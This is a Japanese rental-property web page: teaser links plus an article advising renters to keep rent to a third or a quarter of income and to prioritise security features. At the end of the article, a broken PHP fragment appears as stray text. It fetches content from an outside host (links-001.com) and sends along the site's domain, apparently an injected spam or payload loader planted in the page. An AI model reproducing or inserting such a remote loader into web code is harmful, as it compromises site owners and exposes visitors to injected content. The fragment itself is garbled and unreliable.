前へ
次へ

賃貸の不動産物件におけるトラブル

マンション、アパートを借りる時におきる賃貸の不動産物件のトラブルの多くは退去時に発生する原状回復に関

more

周辺環境を確認して賃貸物件を選ぼう

家賃や間取り、エリアなど希望している条件に合う賃貸物件を見つけたら、必ず内見をしてから契約するかどう

more

敷金礼金のない賃貸の不動産物件とは

日本では賃貸の不動産物件を借りる時には、敷金、礼金を支払うという昔ながらの慣習、慣例があります。

more

家賃と安全性にこだわって賃貸物件を探そう

一人暮らしをするためにお部屋探しをするときは、あらかじめコツを押さえておくと希望に合う暮らしやすい物件が見つかりやすいです。
まず、一番重要なポイントが家賃と安全性です。
家賃は安い方がよいけれど、希望している条件が多い場合、それをすべて叶えてくれる物件を探すとなれば、どうしても家賃を妥協しないと厳しくなります。
家賃を無理してしまうと、どんなに理想的な賃貸物件を見つけたとしても長く住み続けるのが難しいのが実情です。
収入の3分の1から4分の1ほどの物件を探せば、生活が苦しくなることがありません。
もちろん、一人暮らしをするにあたっては、安全性も十分に考慮してお部屋探しをしなければいけません。
たとえば、女性なら2階以上のお部屋を選んだり、オートロックや防犯カメラなどセキュリティ面が充実している物件を選ぶと安心です。
ちなみに、不動産会社を訪れたら、女性スタッフに相談すれば、同じ女性の目線で最適な物件を紹介してくれます。
事前に電話で来店予約を入れるときに、女性スタッフに相談したい旨を伝えておけば、来店してからの待ち時間が少なくなるので便利です。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top